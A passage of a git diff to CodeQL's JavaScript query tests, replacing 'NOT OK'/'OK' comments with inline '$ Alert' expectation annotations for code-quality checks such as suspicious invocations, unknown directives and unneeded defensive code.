x); + "".split("/foo/i"); // $ Alert + "".split("/foo/i", x); // $ Alert } function OK() { diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected index 990eaa36148f..1ce095b51938 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected @@ -2,5 +2,5 @@ | namespace.ts:23:1:23:3 | g() | Callee is not a function: it has type object. | | optional-chaining.js:3:5:3:7 | a() | Callee is not a function: it has type null. | | optional-chaining.js:7:5:7:7 | b() | Callee is not a function: it has type undefined. | -| super.js:11:5:11:11 | super() | Callee is not a function: it has type number. | +| super.js:10:5:10:11 | super() | Callee is not a function: it has type number. | | unreachable-code.js:5:9:5:11 | f() | Callee is not a function: it has type undefined. | diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.js b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.js index dba61f9ff1d3..bdd3414222ea 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.js @@ -8,6 +8,6 @@ function processResponse(response) { if (error) throw error; } else { - error("Unexpected response status " + response.status); + error("Unexpected response status " + response.status); // $ Alert } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.qlref b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.qlref index 23c91fb3f00d..2ef227101966 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.qlref +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.qlref @@ -1 +1,2 @@ -Expressions/SuspiciousInvocation.ql \ No newline at end of file +query: Expressions/SuspiciousInvocation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js index dfc03927130f..db14aca9ea65 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/eval.js @@ -1,12 +1,12 @@ function foo() { var f; eval("f = alert"); - f("Hi"); // OK: initialised by eval + f("Hi"); // OK - initialised by eval } function bar() { var g; - g(); // NOT OK, but not currently flagged + g(); // $ MISSING: Alert eval("g = alert"); } @@ -15,10 +15,10 @@ function baz() { function inner(b) { if (b) { inner(false); - g(); // OK: initialised by eval below + g(); // OK - initialised by eval below } else { eval("g = alert"); } } inner(true); -} \ No newline at end of file +} diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/namespace.ts b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/namespace.ts index c1060e342d37..f03a7ca7150d 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/namespace.ts +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/namespace.ts @@ -5,20 +5,20 @@ namespace f { export function inner() {} } -f(); // OK -f.inner(); // OK +f(); +f.inner(); class C {} namespace C { export function inner() {} } -new C(); // OK -C.inner(); // OK +new C(); +C.inner(); namespace g { export function inner() {} } -g(); // NOT OK -g.inner(); // OK +g(); // $ Alert +g.inner(); diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/optional-chaining.js b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/optional-chaining.js index 9be73a4dde52..acbfddcf53c7 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/optional-chaining.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/optional-chaining.js @@ -1,9 +1,9 @@ (function(){ var a = null; - a(); + a(); // $ Alert a?.(); var b = undefined; - b(); + b(); // $ Alert b?.(); }); diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/super.js b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/super.js index 17152efab227..69754fb386dc 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/super.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/super.js @@ -1,13 +1,12 @@ class A extends null { constructor() { - // OK: calls `Function.prototype` + // OK - calls `Function.prototype` super(); } } class B extends 42 { constructor() { - // NOT OK - super(); + super(); // $ Alert } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/unreachable-code.js b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/unreachable-code.js index b8b89198c46f..b3bd335ede66 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/unreachable-code.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/unreachable-code.js @@ -2,7 +2,7 @@ var getF = function(){} var f = getF(); (function () { - f(); + f(); // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/SuspiciousPropAccess.js b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/SuspiciousPropAccess.js index 4d9aaf9e67dc..5339b6e8903d 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/SuspiciousPropAccess.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/SuspiciousPropAccess.js @@ -1,7 +1,7 @@ function f() { var result; res = computeInterestingResult(); - return result.value; + return result.value; // $ Alert } (function(_window) { diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/SuspiciousPropAccess.qlref b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/SuspiciousPropAccess.qlref index df93925770dd..26f1debdfefe 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/SuspiciousPropAccess.qlref +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/SuspiciousPropAccess.qlref @@ -1 +1,2 @@ -Expressions/SuspiciousPropAccess.ql \ No newline at end of file +query: Expressions/SuspiciousPropAccess.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/export_equals_client.ts b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/export_equals_client.ts index 5b552a15bf2c..0375d6e6327c 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/export_equals_client.ts +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/export_equals_client.ts @@ -1,5 +1,5 @@ import C from "./export_equals"; function f() { - C.staticMethod(); // OK + C.staticMethod(); } diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/export_import_client.ts b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/export_import_client.ts index 5c6d9b12d92c..a9f9b5b9ed9a 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/export_import_client.ts +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/export_import_client.ts @@ -1,5 +1,5 @@ import { importExport } from "./export_import"; function test() { - let f = importExport.prop; // OK + let f = importExport.prop; } diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/optional-chaining.js b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/optional-chaining.js index fa6003ad7959..f755be1ded02 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/optional-chaining.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/optional-chaining.js @@ -1,9 +1,9 @@ (function(){ var a = null; - a.p; + a.p; // $ Alert a?.p; var b = undefined; - b.p; + b.p; // $ Alert b?.p; }); diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/tst.js b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/tst.js index 114fbec93fb4..32e703fc7a4d 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/tst.js +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/tst.js @@ -29,5 +29,5 @@ }); (function(){ - function a(){return null;} a(1)[0]; + function a(){return null;} a(1)[0]; // $ Alert }); diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/tst2.ts b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/tst2.ts index 7cbadb3b5b0a..93ac4836644c 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/tst2.ts +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/tst2.ts @@ -16,9 +16,9 @@ C.foo = 3; namespace N { var x; - x.p = 5; + x.p = 5; // $ Alert - var q = M.Color.Blue; // OK + var q = M.Color.Blue; namespace M { export const enum Color { Blue } diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/typeassertion.ts b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/typeassertion.ts index b4c6980c053c..e3de0b44305e 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/typeassertion.ts +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/typeassertion.ts @@ -8,10 +8,10 @@ function f(x: Base[]) { if (x) { y = x[0] as Sub; } - y.field; // OK + y.field; var z = null as Sub; - z.field; // NOT OK + z.field; // $ Alert } f([new Sub()]); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/typeoftype.ts b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/typeoftype.ts index bd677367a9bf..7f0d7be210f7 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/typeoftype.ts +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousPropAccess/typeoftype.ts @@ -1,6 +1,6 @@ function f() { - var y: typeof N.x // OK - var z = N.x // NOT OK (currently missed due to const enum workaround) + var y: typeof N.x + var z = N.x // $ MISSING: Alert - missed due to const enum workaround namespace N { export var x = 45 } diff --git a/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/UnboundEventHandlerReceiver.qlref b/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/UnboundEventHandlerReceiver.qlref index 6d28236a2296..bcdab46394a1 100644 --- a/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/UnboundEventHandlerReceiver.qlref +++ b/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/UnboundEventHandlerReceiver.qlref @@ -1 +1,2 @@ -Expressions/UnboundEventHandlerReceiver.ql \ No newline at end of file +query: Expressions/UnboundEventHandlerReceiver.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js b/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js index 27409330cd38..f6039b673435 100644 --- a/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js +++ b/javascript/ql/test/query-tests/Expressions/UnboundEventHandlerReceiver/tst.js @@ -5,7 +5,7 @@ class Component0 extends React.Component { render() { return
    -
    // OK +
    } @@ -24,20 +24,20 @@ class Component1 extends React.Component { render() { var unbound3 = this.unbound3; return
    -
    // NOT OK -
    // NOT OK -
    // NOT OK -
    // OK -
    // OK -
    // OK -
    // OK -
    this.unbound_butInvokedSafely(e)}/> // OK -
    // OK -
    // OK -
    // OK -
    // OK -
    // OK -
    // OK +
    { /* $ Alert */ } +
    { /* $ Alert */ } +
    { /* $ Alert */ } +
    +
    +
    +
    +
    this.unbound_butInvokedSafely(e)}/> +
    +
    +
    +
    +
    +
    } @@ -125,7 +125,7 @@ class Component2 extends React.Component { render() { return
    -
    // OK +
    ; } @@ -139,7 +139,7 @@ class Component3 extends React.Component { render() { return
    -
    // OK +
    } @@ -159,7 +159,7 @@ class Component4 extends React.Component { render() { return
    -
    // OK +
    } @@ -177,7 +177,7 @@ class Component5 extends React.Component { render() { return
    -
    // OK +
    } diff --git a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/UnclearOperatorPrecedence.qlref b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/UnclearOperatorPrecedence.qlref index 5a9a25e11186..d4887864cb1d 100644 --- a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/UnclearOperatorPrecedence.qlref +++ b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/UnclearOperatorPrecedence.qlref @@ -1 +1,2 @@ -Expressions/UnclearOperatorPrecedence.ql \ No newline at end of file +query: Expressions/UnclearOperatorPrecedence.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js index 5490b0b4232a..9aa369d69b21 100644 --- a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js +++ b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js @@ -1,10 +1,10 @@ -x.f() & 0x0A != 0; // NOT OK -x.f() & (0x0A != 0); // OK -x.f() & 0x0A != 0; // OK -x.f() & 0x0A!=0; // OK +x.f() & 0x0A != 0; // $ Alert +x.f() & (0x0A != 0); +x.f() & 0x0A != 0; +x.f() & 0x0A!=0; -x !== y & 1; // NOT OK +x !== y & 1; // $ Alert -x > 0 & x < 10; // OK +x > 0 & x < 10; -a&b==c; // NOT OK +a&b==c; // $ Alert diff --git a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js index 800b7b08df2c..d39838870c81 100644 --- a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js +++ b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js @@ -1 +1 @@ -a&b==c; // OK (minified file) +a&b==c; // OK - minified file diff --git a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html index 87f969c3e179..03ac0651186e 100644 --- a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html +++ b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html @@ -1,6 +1,6 @@ - - - + + + diff --git a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js index 0645f8821a1d..e86b7b9d95bc 100644 --- a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js +++ b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js @@ -1,51 +1,51 @@ -"use foo"; // NOT OK -"use strict"; // NOT OK +"use foo"; // $ Alert +"use strict"; function bad() { - "'use strict'"; // NOT OK - "use strict;"; // NOT OK - "'use strict';"; // NOT OK - "'use strict;'"; // NOT OK - "use-strict"; // NOT OK - "use_strict"; // NOT OK - "uses strict"; // NOT OK - "use struct;" // NOT OK - "Use Strict"; // NOT OK - "use bar"; // NOT OK + "'use strict'"; // $ Alert + "use strict;"; // $ Alert + "'use strict';"; // $ Alert + "'use strict;'"; // $ Alert + "use-strict"; // $ Alert + "use_strict"; // $ Alert + "uses strict"; // $ Alert + "use struct;" // $ Alert + "Use Strict"; // $ Alert + "use bar"; // $ Alert } function ignored() { var x = 42; - "use baz"; // OK: not a directive, positionally + "use baz"; // OK - not a directive, positionally } function good() { - "use strict"; // OK - "use asm"; // OK - "use babel"; // OK - "use 6to5"; // OK - "format cjs" // OK - "format esm"; // OK - "format global"; // OK - "format register"; // OK - "ngInject"; // OK - "ngNoInject"; // OK - "deps foo"; // OK - "deps bar"; // OK - "use server"; // OK - "use client"; // OK + "use strict"; + "use asm"; + "use babel"; + "use 6to5"; + "format cjs" + "format esm"; + "format global"; + "format register"; + "ngInject"; + "ngNoInject"; + "deps foo"; + "deps bar"; + "use server"; + "use client"; } function data() { - "[0, 0, 0];"; // NOT OK - "[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];"; // NOT OK + "[0, 0, 0];"; // $ Alert + "[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];"; // $ Alert } function yui() { - "foo:nomunge"; // OK - "bar:nomunge, baz:nomunge,qux:nomunge"; // OK - ":nomunge"; // NOT OK - "foo(), bar, baz:nomunge"; // NOT OK + "foo:nomunge"; + "bar:nomunge, baz:nomunge,qux:nomunge"; + ":nomunge"; // $ Alert + "foo(), bar, baz:nomunge"; // $ Alert } function babel_typeof(obj) { diff --git a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.qlref b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.qlref index 2cd60100c59e..0fa5fe40535d 100644 --- a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.qlref +++ b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.qlref @@ -1 +1,2 @@ -Expressions/UnknownDirective.ql \ No newline at end of file +query: Expressions/UnknownDirective.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/HeterogeneousComparison.qlref b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/HeterogeneousComparison.qlref index 13b0e2a181cb..22ce4796bb35 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/HeterogeneousComparison.qlref +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/HeterogeneousComparison.qlref @@ -1 +1,2 @@ -Expressions/HeterogeneousComparison.ql \ No newline at end of file +query: Expressions/HeterogeneousComparison.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/UnneededDefensiveProgramming.qlref b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/UnneededDefensiveProgramming.qlref index 13c05f1e74bd..98fc974827b4 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/UnneededDefensiveProgramming.qlref +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/UnneededDefensiveProgramming.qlref @@ -1 +1,2 @@ -Expressions/UnneededDefensiveProgramming.ql +query: Expressions/UnneededDefensiveProgramming.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/UselessConditional.qlref b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/UselessConditional.qlref index d29916245d6e..85ffff223221 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/UselessConditional.qlref +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/UselessConditional.qlref @@ -1 +1,2 @@ -Statements/UselessConditional.ql \ No newline at end of file +query: Statements/UselessConditional.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js index 8c61f38d1132..99e77e8cc491 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/global-module-definition.js @@ -7,5 +7,5 @@ var Mod1; var Mod2; (function (Mod2) { Mod2.p = 42; - })(Mod2 || (Mod2 = {})); // NOT OK + })(Mod2 || (Mod2 = {})); }); diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js index 913684d6f6aa..1de67b231fa8 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/module-environment-detection.js @@ -20,5 +20,5 @@ if (typeof exports !== 'undefined') { (function(){ var module; - if(typeof module === 'undefined'); // NOT OK + if(typeof module === 'undefined'); // $ Alert[js/unneeded-defensive-code] }); diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js index cfc6f1e6df71..adf17a8b3fd0 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/regression.js @@ -6,10 +6,10 @@ function getDate() { return null; } console.log(date); - return date && date.getTime(); // NOT OK + return date && date.getTime(); // $ Alert[js/unneeded-defensive-code] } function isNotNullOrString(obj) { - return obj != null && obj != undefined && // NOT OK - typeof obj != 'string'; + return obj != null && obj != undefined && // $ Alert[js/unneeded-defensive-code] + typeof obj != 'string'; } diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js index ace5a3dd7ac8..7b4a4b799e06 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst.js @@ -10,95 +10,95 @@ var o_ = o; var x_ = x; - u_ = u_ || e; // NOT OK - n_ = n_ || e; // NOT OK - o_ = o_ || e; // NOT OK + u_ = u_ || e; // $ MISSING: Alert[js/unneeded-defensive-code] + n_ = n_ || e; // $ MISSING: Alert[js/unneeded-defensive-code] + o_ = o_ || e; // $ MISSING: Alert[js/unneeded-defensive-code] x_ = x_ || e; - u && u.p; // NOT OK - n && n.p; // NOT OK - o && o.p; // NOT OK + u && u.p; // $ Alert[js/unneeded-defensive-code] + n && n.p; // $ Alert[js/unneeded-defensive-code] + o && o.p; // $ Alert[js/unneeded-defensive-code] x && x.p; - u && u(); // NOT OK - n && n(); // NOT OK - o && o(); // NOT OK + u && u(); // $ Alert[js/unneeded-defensive-code] + n && n(); // $ Alert[js/unneeded-defensive-code] + o && o(); // $ Alert[js/unneeded-defensive-code] x && x(); - !u || u.p; // NOT OK - !n || n.p; // NOT OK - !o || o.p; // NOT OK + !u || u.p; // $ Alert[js/unneeded-defensive-code] + !n || n.p; // $ Alert[js/unneeded-defensive-code] + !o || o.p; // $ Alert[js/unneeded-defensive-code] !x || x.p; - !!u && u.p; // NOT OK - !!n && n.p; // NOT OK - !!o && o.p; // NOT OK + !!u && u.p; // $ Alert[js/unneeded-defensive-code] + !!n && n.p; // $ Alert[js/unneeded-defensive-code] + !!o && o.p; // $ Alert[js/unneeded-defensive-code] !!x && x.p; - u != undefined && u.p; // NOT OK - n != undefined && n.p; // NOT OK - o != undefined && o.p; // NOT OK + u != undefined && u.p; // $ Alert[js/unneeded-defensive-code] + n != undefined && n.p; // $ Alert[js/unneeded-defensive-code] + o != undefined && o.p; // $ Alert[js/unneeded-defensive-code] x != undefined && x.p; - u == undefined || u.p; // NOT OK - n == undefined || n.p; // NOT OK - o == undefined || o.p; // NOT OK + u == undefined || u.p; // $ Alert[js/unneeded-defensive-code] + n == undefined || n.p; // $ Alert[js/unneeded-defensive-code] + o == undefined || o.p; // $ Alert[js/unneeded-defensive-code] x == undefined || x.p; - u === undefined || u.p; // NOT OK - n === undefined || n.p; // NOT OK - o === undefined || o.p; // NOT OK + u === undefined || u.p; // $ Alert[js/unneeded-defensive-code] + n === undefined || n.p; // $ Alert[js/unneeded-defensive-code] + o === undefined || o.p; // $ Alert[js/unneeded-defensive-code] x === undefined || x.p; - if (u) { // NOT OK + if (u) { // $ Alert[js/unneeded-defensive-code] u.p; } - if (n) { // NOT OK + if (n) { // $ Alert[js/unneeded-defensive-code] n.p; } - if (o) { // NOT OK + if (o) { // $ Alert[js/unneeded-defensive-code] o.p; } if (x) { x.p; } - u? u():_; // NOT OK - n? n(): _; // NOT OK - o? o(): _; // NOT OK + u? u():_; // $ Alert[js/unneeded-defensive-code] + n? n(): _; // $ Alert[js/unneeded-defensive-code] + o? o(): _; // $ Alert[js/unneeded-defensive-code] x? x(): _; - if (u !== undefined) { // NOT OK + if (u !== undefined) { // $ Alert[js/unneeded-defensive-code] u.p; } - if (n !== undefined) { // NOT OK + if (n !== undefined) { // $ Alert[js/unneeded-defensive-code] n.p; } - if (o !== undefined) { // NOT OK + if (o !== undefined) { // $ Alert[js/unneeded-defensive-code] o.p; } if (x !== undefined) { x.p; } - if (u == undefined){} // NOT OK - if (n == undefined){} // NOT OK - if (o == undefined){} // NOT OK + if (u == undefined){} // $ Alert[js/unneeded-defensive-code] + if (n == undefined){} // $ Alert[js/unneeded-defensive-code] + if (o == undefined){} // $ Alert[js/unneeded-defensive-code] if (x == undefined){} - if (u != undefined){} // NOT OK - if (n != undefined){} // NOT OK - if (o != undefined){} // NOT OK + if (u != undefined){} // $ Alert[js/unneeded-defensive-code] + if (n != undefined){} // $ Alert[js/unneeded-defensive-code] + if (o != undefined){} // $ Alert[js/unneeded-defensive-code] if (x != undefined){} - if (typeof u === "undefined"){} // NOT OK - if (typeof n === "undefined"){} // NOT OK - if (typeof o === "undefined"){} // NOT OK + if (typeof u === "undefined"){} // $ Alert[js/unneeded-defensive-code] + if (typeof n === "undefined"){} // $ Alert[js/unneeded-defensive-code] + if (typeof o === "undefined"){} // $ Alert[js/unneeded-defensive-code] if (typeof x === "undefined"){} function f() { } - typeof f === "function" && f(); // NOT OK - typeof u === "function" && u(); // NOT OK + typeof f === "function" && f(); // $ Alert[js/unneeded-defensive-code] + typeof u === "function" && u(); // $ Alert[js/unneeded-defensive-code] typeof x === "function" && x(); var empty_array = []; @@ -111,9 +111,9 @@ var _true = true; var _false = false; - empty_array && empty_array.pop(); // NOT OK - pseudo_empty_array && pseudo_empty_array.pop(); // NOT OK - non_empty_array && non_empty_array.pop(); // NOT OK + empty_array && empty_array.pop(); // $ Alert[js/unneeded-defensive-code] + pseudo_empty_array && pseudo_empty_array.pop(); // $ Alert[js/unneeded-defensive-code] + non_empty_array && non_empty_array.pop(); // $ Alert[js/unneeded-defensive-code] empty_string && empty_string.charAt(0); non_empty_string && non_empty_string.charAt(0); zero && zero(); @@ -121,23 +121,23 @@ _true && _true(); _false && _false(); - (u !== undefined && u !== null) && u.p; // NOT OK - u !== undefined && u !== null && u.p; // NOT OK + (u !== undefined && u !== null) && u.p; // $ Alert[js/unneeded-defensive-code] + u !== undefined && u !== null && u.p; // $ Alert[js/unneeded-defensive-code] - u != undefined && u != null; // NOT OK - u == undefined || u == null; // NOT OK - u !== undefined && u !== null; // NOT OK - !(u === undefined) && !(u === null); // NOT OK - u === undefined || u === null; // NOT OK - !(u === undefined || u === null); // NOT OK - !(u === undefined) && u !== null; // NOT OK + u != undefined && u != null; // $ Alert[js/unneeded-defensive-code] + u == undefined || u == null; // $ Alert[js/unneeded-defensive-code] + u !== undefined && u !== null; // $ Alert[js/unneeded-defensive-code] + !(u === undefined) && !(u === null); // $ Alert[js/unneeded-defensive-code] + u === undefined || u === null; // $ Alert[js/unneeded-defensive-code] + !(u === undefined || u === null); // $ Alert[js/unneeded-defensive-code] + !(u === undefined) && u !== null; // $ Alert[js/unneeded-defensive-code] u !== undefined && n !== null; - u == undefined && u == null; // NOT OK + u == undefined && u == null; // $ Alert[js/unneeded-defensive-code] x == undefined && x == null; - x === undefined && x === null; // NOT OK + x === undefined && x === null; // $ Alert[js/unneeded-defensive-code] if (x === undefined) { - if (x === null) { // NOT OK + if (x === null) { // $ Alert[js/unneeded-defensive-code] } } @@ -153,16 +153,16 @@ } } - x != undefined && x != null; // NOT OK + x != undefined && x != null; // $ Alert[js/unneeded-defensive-code] if (x != undefined) { - if (x != null) { // NOT OK + if (x != null) { // $ Alert[js/unneeded-defensive-code] } } - if (typeof x !== undefined); - if (typeof window !== undefined); + if (typeof x !== undefined); // $ Alert[js/comparison-between-incompatible-types] + if (typeof window !== undefined); // $ Alert[js/comparison-between-incompatible-types] if (typeof x !== x); - if (typeof x !== u); // NOT OK + if (typeof x !== u); // $ Alert[js/comparison-between-incompatible-types] if (typeof window !== "undefined"); if (typeof module !== "undefined"); @@ -172,12 +172,12 @@ if (typeof module !== "undefined" && module.exports); if (typeof global !== "undefined" && global.process); - u && (f(), u.p); - u && (u.p, f()); // technically not OK, but it seems like an unlikely pattern - u && !u.p; // NOT OK - u && !u(); // NOT OK + u && (f(), u.p); // $ Alert[js/trivial-conditional] + u && (u.p, f()); // $ Alert[js/trivial-conditional] - technically not OK, but it seems like an unlikely pattern + u && !u.p; // $ Alert[js/unneeded-defensive-code] + u && !u(); // $ Alert[js/unneeded-defensive-code] + - function hasCallbacks(success, error) { if (success) success() if (error) error() diff --git a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js index 588844f9c75f..eb0dee8c535e 100644 --- a/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js +++ b/javascript/ql/test/query-tests/Expressions/UnneededDefensiveProgramming/tst2.js @@ -1,7 +1,7 @@ (function(){ var v; (function(){ - if(typeof v === "undefined"){ // NOT OK + if(typeof v === "undefined"){ // $ Alert[js/unneeded-defensive-code] v = 42; } for(var v in x){ @@ -9,10 +9,10 @@ }); }); -const isFalsyObject = (v) => 